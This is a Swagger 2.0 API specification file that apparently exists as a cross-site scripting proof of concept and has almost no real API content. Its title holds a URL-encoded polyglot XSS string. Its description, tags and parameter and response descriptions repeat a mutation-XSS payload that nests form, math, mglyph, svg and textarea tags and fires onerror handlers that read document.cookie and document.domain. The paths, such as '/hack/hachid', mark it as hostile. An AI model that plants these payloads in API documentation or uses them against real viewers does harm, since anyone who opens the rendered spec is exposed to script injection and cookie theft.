swagger: '2.0'
info:
  title: "><title><input+type%3Dtext+value%3DjaVasCript%3A%2F*-%2F*%60%2F*%5C%60%2F*'%2F*"%2F**%2F(%2F*+*%2FoNcliCk%3Dalert(document.cookie)+)%2F%2F%0D%0A%0D%0A%2F%2F<%2FstYle%2F<%2FtitLe%2F<%2FteXtarEa%2F<%2FscRipt%2F--!>%5Cx3csVg%2F<sVg%2FoNloAd%3Dalert(document.cookie)%2F%2F>%5Cx3e><%2Finput><input+type%3Dtext+value%3DjaVasCript%3A%2F*-%2F*%60%2F*%5C%60%2F*'%2F*"%2F**%2F(%2F*+*%2FoNcliCk%3Dalert(document.cookie)+)%2F%2F%0D%0A%0D%0A%2F%2F<%2FstYle%2F<%2FtitLe%2F<%2FteXtarEa%2F<%2FscRipt%2F--!>%5Cx3csVg%2F<sVg%2FoNloAd%3Dalert(document.cookie)%2F%2F>%5Cx3e><%2Finput><%2Ftitle>
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>">"><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /SYARIF07:
    get:
      responses:
        '200':
          description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
      tags:
        - SYARIF07_XSS_D<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
